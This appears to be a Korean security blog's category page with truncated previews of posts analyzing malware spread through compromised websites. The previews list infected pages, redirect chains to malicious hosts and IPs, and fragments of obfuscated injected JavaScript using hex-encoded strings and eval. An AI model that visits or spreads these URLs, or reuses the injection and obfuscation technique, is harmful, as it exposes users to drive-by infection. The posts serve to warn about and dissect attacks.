본문 바로가기

악성코드 유포

[Web Developer Forum - 2012.06.13] Malicious Code Inject: What Does It Do? 우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다. 1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")--> http://fukbb.com 2... 더보기
HEX 값으로 유포하는 악성 Iframe Script 발견지 : http://integridesign.com/David/index.php?target=contact* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다! 위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다! 잠깐 확인을 해보자면 이 코드는 간단하다. "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 ! Decode 를 해보면 연결되는 사이트는 다음과 같다 ! document.write('') ==.. 더보기
악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 ! 최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js http://lzxvx.com/pix/rot.html http://lzxvx.com/pix/ll.html ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css http://lzxvx.com/pix/swfobject.js http://lzxvx.com/pix/jpg.js var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%.. 더보기
폴리뉴스 악성코드 유포 스크립트 간단하게 살펴보기.. !! * 본사이트는 악성코드가 있는 사이트를 알려 드립니다.!! 유포지 : http://www.polinews.co.kr [연결 되는 곳] http://204.188.243.136:7x/page/page.js http://204.188.243.136:7x/page/vospt.html http://204.188.243.136:7x/page/vegoa.htm http://204.188.243.136:7x/page/vtfep.htm[차례] page.js 보기 page.js 해석된 코드 vegoa.htm , vtfep.htm 메인코드 보기 ! Page.js 보기 !! var figwZPKw1="\x65\x6c\x67\x68\x35\x39\x33\x6b\x37\x73\x6b\x65\x72\x67\x35\x67\x73\.. 더보기
악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ?? 어제 게시물 : [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다. 전 게시물에 이어서 오늘도 역시 유포가 계속되고 있습니다. 오늘 아침에는 링크가 지워진것을 보았으니 또다시 링크를 삽입하여서 유포중에 있습니다. 빠른 조치가 될 줄 알았지만 지금도 역시 사이트에 접속하면 링크안에 또 다시 악성코드가 자리를 잡고 있음을 확인하였습니다. 왠지 계속 뚫리는거 보니 확인하는게 그때 그때만 하는게 아닌지 생각이 드네요...어제에 쓴 글과 같이 오늘도 역시 실망을 시키지 않는 취업 , 포털사이트 빨리 수정이 되었으면 하네요 . 현재 js 파일 안에는 또 다른 js로 연결되는 아이프레임이 삽입 되어 있습니다. 현재 포털 JS 안에는 아이프레임 형식이아닌 꼬여놓아서 코드를 만들어 .. 더보기
지난주 악성코드 사이트 유포지 9곳 종합 ! 1. 사이트 !! 큐x텔 : http://www.cxxxxtel.com/html 보안xx : http://www.bxxx.com 세x즌 : http://www.cxxxzen.com 한국 x xxx 협회 : http://www.x-xxxrts.or.kr 게xx임 : http://www.gaxxxxme.co.kr/main.asp 플xx 3x5 : http://fxxxx3x5.korea.com 메xx서울 : http://www.mxxxxseoul.co.kr 2. 유포지 !! 큐x텔 : http://1xx.4x.1x9.2xx/css/Lib.asp 보안xx : http://58xxx.com/js.js http://58xxx.com/ad.htm http://58xxx.com/top.jpg ~> 최종파일 다운 !! .. 더보기